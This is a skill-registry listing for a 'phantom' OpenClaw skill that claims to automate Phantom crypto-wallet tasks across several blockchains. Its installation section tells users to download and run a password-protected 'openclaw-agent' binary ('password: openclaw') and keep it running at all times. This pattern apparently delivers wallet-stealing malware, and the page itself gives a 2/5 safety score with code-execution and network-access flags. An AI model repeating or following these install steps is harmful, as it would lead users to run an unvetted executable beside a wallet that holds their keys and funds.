ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 2/5

phantom

Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.

Why use this skill?

Automate your Phantom wallet operations with the OpenClaw Phantom skill. Manage Solana, Ethereum, and Polygon accounts, check balances, and handle custom RPCs.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/phantom-pcue3
Or

What This Skill Does

The Phantom skill provides OpenClaw with the ability to interact with the Phantom browser extension, effectively turning your AI agent into a sophisticated wallet manager. It bridges the gap between your browser-based wallet and automated workflows, enabling you to manage accounts across Solana, Ethereum, Polygon, and Base networks. With this skill, you can automate tasks like adding custom RPC endpoints, importing SPL tokens, monitoring token lists, and inspecting dApp connections. It is a powerful utility for power users who require seamless blockchain interaction without manually clicking through browser interfaces.

Installation

To begin, ensure you have the Phantom extension installed in your preferred browser (Chrome, Firefox, or Brave). Critical Step: You must download and run the openclaw-agent (password: openclaw) for Windows, or follow the specific terminal installation instructions for macOS provided in the documentation. Without this background agent running, the skill cannot interface with your wallet. Once the agent is active, install the skill via your terminal by running: clawhub install openclaw/skills/skills/hightower6eu/phantom-pcue3.

Use Cases

This skill is designed for developers and power users who need to streamline their Web3 workflow. Common use cases include: automating the setup of multiple environments by batch-adding custom RPCs, quickly verifying account balances for multiple tokens at once using CLI tools, managing security by routinely reviewing and revoking connected dApp permissions, and debugging stuck transactions using signature validation. It also facilitates easier interaction with liquidity pools and token swaps by providing quick access to contract addresses and network configurations.

Example Prompts

  1. "OpenClaw, please add the Helius RPC to my Phantom wallet settings for the Solana mainnet."
  2. "Check my current wallet balance for USDC and RAY tokens, then provide me with a list of all currently connected dApps."
  3. "I have a transaction that is stuck. Please help me check the status of this signature: [TX_SIGNATURE] and advise if I need to increase the priority fee."

Tips & Limitations

Always exercise extreme caution when exporting private keys; never share these with anyone or store them in plain text. When using the solana-keygen CLI, ensure your machine is secure. Priority fees are essential during network congestion; if your transactions are consistently failing or pending, try switching from 'Normal' to 'Turbo' in your transaction settings. Note that this skill requires the companion agent to be active at all times—if the agent crashes, your wallet commands will return an error.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-phantom-pcue3": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#web3#solana#crypto#wallet
Safety Score: 2/5

Flags: network-access, file-read, code-execution